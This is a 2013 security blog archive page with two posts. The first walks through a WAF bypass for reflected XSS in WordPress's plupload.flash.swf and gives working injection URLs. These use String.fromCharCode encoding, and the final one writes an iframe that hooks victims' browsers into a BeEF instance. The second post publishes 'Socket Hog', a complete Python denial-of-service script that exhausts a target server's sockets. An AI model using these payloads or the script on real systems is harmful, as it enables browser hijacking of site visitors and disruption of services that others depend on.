-=c0v3rt_ch4nn3l=-: April 2013

Friday, April 12, 2013

XSS WAF Bypass Using CharCode() Encoding

Recently I had found a potential XSS injection point, while testing a client's web app. Unfortunately, most of the common XSS techniques did not work on this particular Word Press plugin 'plupload.flash.swf'.

Found the XSS injection point here:

http://webhost/wp-includes/js/plupload/plupload.flash.swf?id=

And got an initial alert box:

http://webhost/wp-includes/js/plupload/plupload.flash.swf?id=\%22%29%29;}catch%28c%29{alert%281%29;}//
(Which displays an alert box with a value of “1” – you cannot input [a-zA-Z] for some reason.

I spent the earlier part of the morning trying to get it to do more, or allow <script> tags, but I realized where it’s injecting the javascript, you can’t use the html tagging.

I bypassed that limitation using CharCode() encoding and got the standard alert box with [a-zA-Z] displaying. But I wanted to still try to take it a next step and get the browser hooked into BeEF.

http:///wp-includes/js/plupload/plupload.flash.swf?id=\%22));}catch(e){alert(String.fromCharCode(120,66,49,78,52,82,89,120));}//

So, I thought of using a 'document.write' and encoding html tagging within that, or basically writing a new page to the browser. This writes a NEW page to the browser and contains a <script>alert(“XSS”)</script>

It’s like XSS within XSS!

Now with that POC, I encoded a new page with an iframe to redirect into my BeEF instance…Look at this string LOL.

http:///wp-includes/js/plupload/plupload.flash.swf?id=\"));}catch(e){document.write(String.fromCharCode(60,104,116,109,108,62,60,98,111,100,121,62,60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,49,50,55,46,48,46,48,46,49,58,51,48,48,48,47,100,101,109,111,115,47,98,97,115,105,99,46,104,116,109,108,34,62,60,47,105,102,114,97,109,101,62,60,47,98,111,100,121,62,60,47,104,116,109,108,62));}//

And Bingo! Browser is now hooked…We've defeated the WAF and created a dangerous XSS string!

Props to Uncle Jim's charcode decoder/encoder:
http://jdstiles.com/java/cct.html

Friday, April 5, 2013

Socket Hog v1.0

This simple tool will attempt to open (and keep open) TCP connections to a given port, ultimately exhausting server sockets for a given amount of time.

###################################
#                                 # 
# Socket Hog v1.0 - Charles Riggs #
#                                 #
###################################

#!/usr/bin/python

import socket
import time

host=raw_input( "Host IP to attack:" )
port=input( "Port to attack:" )
conn=input( "How many connections do you want to make:" )
opentime=input( "How many seconds to keep the connections open:" )

num1 = 0
allsockets=[]
while (num1 <= conn):
        s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        allsockets.append(s)
        s.settimeout(10.0)
        s.connect((host,port))
        num1=num1+1

time.sleep(opentime)